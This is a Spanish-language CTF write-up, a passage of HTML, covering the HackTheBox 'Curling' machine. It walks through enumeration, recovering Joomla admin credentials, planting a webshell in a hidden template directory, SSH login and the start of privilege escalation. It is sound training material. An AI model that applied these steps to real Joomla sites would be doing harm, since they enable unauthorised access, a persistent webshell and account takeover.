<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x3} Enumeración</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Lanzamos </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">gobuster -e -u http://curling.htb/ -w /usr/share/wordlists/dirb/common.txt</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> sobre el servicio </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">web en el dominio </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">curling.htb </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="402" src="https://lh5.googleusercontent.com/HDo3a-Oj4YSgpjEzTeaEV2gthuXHW5YO8qlqyl5fSzFnFNsboHE1F6lHxqBLoOL_GMi48yp2tKWHoo_LlXywvIDEIhcyoyqHj-HO6OMSIhgOibIzjLV1BMaJ6mDajmCivVod2gVH" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="515" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Detectamos que es accesible </span><a href="http://10.10.10.150/index.php" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://10.10.10.150/index.php</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y con la herramienta http sobre </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">el index.php obtenemos pista al final de código.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="175" src="https://lh5.googleusercontent.com/lvh30iP0hyclwEynv2eO1hFmYAC337EY1HUbUzqhFnraC73b75wAQkXNCEjG9cfxTkbQfwIpt_HH2rQwdTtF7MaU26uPfVJDn5aInzczZKtSgoy_-rpveM3x-lJmGorrMtY5qL5z" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="541" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Obtenemos una posible clave </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Curling2018</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">! para el acceso:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">curl http://curling.htb/secret.txt > Q3VybGluZzIwMTgh | base64 -d | Curling2018!</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pasamos a explorar el Joomla y nos encontramos con su primer post que nos desvela un posible </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">usuario en la URL </span><a href="http://curling.htb/index.php/2-uncategorised/1-first-post-of-curling2018" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://curling.htb/index.php/2-uncategorised/1-first-post-of-curling2018</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="333" src="https://lh5.googleusercontent.com/dhacj9YuT7rN15VxwmgJxW5XUs5AxZB5YPeoSGalkNUOzQ04wfoSp51YxFYbhgMV20DROXOBqqu707vmXB9HYIbMGOIO5kkqs9dQtuselOd6vUbtWeAH1g8Xcd2Oy3cAhCPcFFxo" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="522" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="75" src="https://lh3.googleusercontent.com/Wi26Rpv4DElSMDztrz7HRhnPGl9vU6g-VcdklwGMFOuNUpOWeH4M4BtXUpOAztwVEI2UXwSsA4CNo5ylpY3Fipi6Buuv5OLIPdEAZrvFDdeCueN1Sv-eb7ZtThuqQqs1TGxRK-xk" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="485" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Conseguimos en la captura un posible nombre de usuario que se identifica como </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Floris</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pasamos a comprobar que las credenciales </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Floris:Curling2018!</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> son válidas en el panel de </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">administración de Joomla en </span><a href="http://curling.htb/administrator" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://curling.htb/administrator</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x4} Acceso</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accedemos con éxito a la administración del Joomla para subir nuestra </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">webshell</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que intentaremos </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">alojarla en un directorio no llamativo como es </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">/templates</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="197" src="https://lh6.googleusercontent.com/9rPO-a4bua9bIP_ufKgOgXvf8Q069TB0pKTJ-b-o8hgR727-uiukug3Dspio0-EYVhcTcg-JOQGV5YmNxzKuSVsEQ2lFbmn0Y7fn8WKb8RdQx3WR0WKJXZ0FDx8SztQ_LQ7epLRJ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="475" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="132" src="https://lh4.googleusercontent.com/PXtlvVR5ZBNKGRNhqveG2dYOGTNTkqgtTlmDC_L9XE7Ow383dHM1rjXsbsjLc2SjCjSIOZQ-wrNiNz3v6PwtjrAofcwUaGE2BDfMpDvDeB_Jj_WnNPcoPU3g8EPJfjURONkQViut" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="475" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Navegamos por el menú de administrador </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Extensions> Templates > Templates > protostar</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">y seleccionamos crear nuevo archivo que en este caso tendrá el código de nuestra webshell </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(</span><a href="https://github.com/k4mpr3t/b4tm4n" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/k4mpr3t/b4tm4n</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="133" src="https://lh6.googleusercontent.com/mJ6gANXJtJW4XnvoMyXbbzSaELAnawYrBIeHyppW9rf-QPSK1X72wpes8KvDYp8nVar4x2nI84R2kM3aYZW7CvV2EmIYJfY1VeEOibzZhSc9d-FMJu0l09omOuej_UVsKfOkWeNq" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="477" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="217" src="https://lh4.googleusercontent.com/NeDZ2j6WlaksjoJPX49EjOKQFtlkiOkU6Ksw7V8HQis6fZ6PLOfKaz8Hf_afJW5jzMmQkrEItTu9pGpLss--8X1dRfuCziayAZiILtuwoXKSd0HhXTC2d4j90D0T21OWYNwTxpeY" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="474" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ya podemos acceder a la webshell en la siguiente URL </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="211" src="https://lh5.googleusercontent.com/_MJZpP2An4k0ArQvFeVNtoD2vNQnny76z8H0LDKjgc_PNfILj7PCnm0QoFVpzCdY421EwY4hkbnvwgmXNGWDSbi0oO4t-GcCIKTikhJPR7N3CShbE2Jkz-Y7dwkNn6hFWonEYsVr" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="435" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Por defecto la webshell posee las credenciales </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">k4mpr3t:k4mpr3t</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que pasaremos a modificar </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">en el menú Account. Pasamos a explorar directorios aunque no podemos acceder a user.txt ya </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">que pertenecemos todavía al grupo de </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">floris</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="197" src="https://lh5.googleusercontent.com/rI9uabTfEpnAcoMq95quh-VUadW-ANDG4ljoDscg06BBXEZ7mZ-KUP2_CoLK-V3_FTe2DveGL0xhiKcnKZ8VZxkNOKEKstdTT0lSIuw289W9CbimriHf47LN4RnRv4xJOCTSCQzv" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="522" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="198" src="https://lh4.googleusercontent.com/-iIQOzjnwLoxrpnPXb9v9x9dvSNTAUPLaswGcIDdpA5SvRDis2TqeH-y7aLhcxzqsl4YOoqT3ZkAbwqeUZ3-iODCvF-4mKdqvONATh9KdguzWyXrTOzSEq3JlJXQwNR3SIxOju1G" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="520" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="76" src="https://lh5.googleusercontent.com/sNR0M5n430tj7RttLyAoUPCsgfkDebxUse2D6JIGRIx-Jn-AHq2dmLHfvGEKBybp1eVtsL6kzLDPcPtfDpJp5mq0ANEmO11pdszA57qBJmhIh-P_DnpKt81OyiMxfh8V2-3mxGYq" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="555" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Nos encontramos con </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">password_backup</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> en el directorio </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/home/floris/</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> con el </span><a href="https://en.wikipedia.org/wiki/Hex_dump" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">Hexdump</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> de una </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">posible clave para poder avanzar. Procedemos a descargarlo en nuestro Kali y hacemos </span><a href="https://kongwenbin.wordpress.com/2016/08/26/overthewire-bandit-level-12-to-level-13/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">reversing</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">obteniendo </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">5d<wdCbdZu)|hChXll</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="247" src="https://lh4.googleusercontent.com/h5-peMYphFklk5zbkWukf2E_29ahDUMPBRJ2gYJ_-oKDaPQ-H8iSyRadhXHRLmJ1JFboA__8_Ih-0-TdJYqOZqmdreLl_tb3cA6URBijx3GH_cHlgKAqfdPzF_2OLj_IhlSpGH5R" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="524" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="274" src="https://lh5.googleusercontent.com/m9iWxE9FB5bFqz_ANUrU6VPWdXcQnVEJYec94hblHu5DWLgkD3-chUiZJXjPHpUvP5WB_x_4fqmonKo_A_qwHc-KSD25d27Ds71GX6i16h_utiZZiwR4ZHrggU51Ldr94dVP-837" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Conectamos por ssh con el usuario </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">floris</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y la password </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">5d<wdCbdZu)|hChXll</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="335" src="https://lh6.googleusercontent.com/J4YTpOOn05MmEaGRalai1rWaLvluKs9p0Mwbpnm2kS4-kx9bhOEkb-M77F4NN9oLrpOqTq7c3nngRoFOlA-4FGmRVUC9Wg_IigyveKldpH6XRJYPQDlqdgT-SKqpbxemCSzTY26n" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="579" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="149" src="https://lh5.googleusercontent.com/enT4h_1-AkXKHyk4wbHDtKQX5OoTN8vK8k5noIFxK3bWJqHG8fz0SP959aCoCVAKpX3a1gUXTV3QaqepIFKSXI3ZF0oMXT5zcSF1mIioUWhJuZYYQxHjtgLn-9t1yAttmCSquhGR" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="581" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y conseguimos tener acceso a user.txt ></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">65dd1df0713b40d88ead98cf11b8530b</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="253" src="https://lh6.googleusercontent.com/sicOnMpO87oIkNn-DNcD3zgif9KTM7-v_9P2EEFhpMXjqy770VRWywa_iquA60SglqORmyKKBF45i93Xsz7181fU_nZBMiwzVngRuPT9-2rU3mEDpqfYIVwSJ5siD1oxCL9F3tvI" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="245" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">{0x5} – Escalada de Privilegios (privesc)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accedemos al directorio /tmp donde utilizaremos un scanner de vulnerabilidades de Linux </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(</span><a href="https://github.com/mzet-/linux-exploit-suggester" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/mzet-/linux-exploit-suggester</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">) que nos facilitará nuestro privesc.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
